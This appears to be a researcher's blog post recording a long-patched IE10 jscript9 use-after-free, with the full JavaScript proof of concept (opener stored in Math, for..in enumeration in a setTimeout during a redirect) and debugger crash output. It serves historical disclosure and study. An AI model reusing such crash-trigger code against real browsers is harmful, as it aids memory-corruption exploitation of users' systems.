IE10 EoP: Enumerating New Window Object During Redirect is EXPLOITABLE

I found that opening a new window, saving a reference to opener in Math, and then enumerating the window object with for..in in a setTimeout just as the server redirect fired caused a crash rated EXPLOITABLE in jscript9. The key to making the crash exploitable rather than just a simple crash was storing the opener reference in Math and using setTimeout for the enumeration — a tip shared by Gareth Heyes.

function main()
{
    win = window.open("redirect.aspx");
    win.setTimeout('Math.op=opener;setTimeout(\'Math.op.forIn(window);\',100);', 1000);
}
function forIn(obj)
{
    var value;
    for (var i in obj){
        if (i == obj) continue;
        try{value = (obj)[i] + "";}
            catch (e){value = "NO_ACCESS";}
        document.getElementById("tricked_TA").value += i + " = " + value;
    }
}

The fault landed at heap address 0x31e8506a — a DEP violation in freed memory called from JSCRIPT9!JsVarToExtension+0x3c. The debugger rated it EXPLOITABLE as a software NX fault in an invalid/freed block, indicating potential control over the execution pointer via the heap.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Sandbox Bypass: Triggering a Download and Going Back Removes Sandbox Flags] :: [IE10 UXSS: New Window pushState + designMode + Back Button Gives Cross-Origin DOM Access] >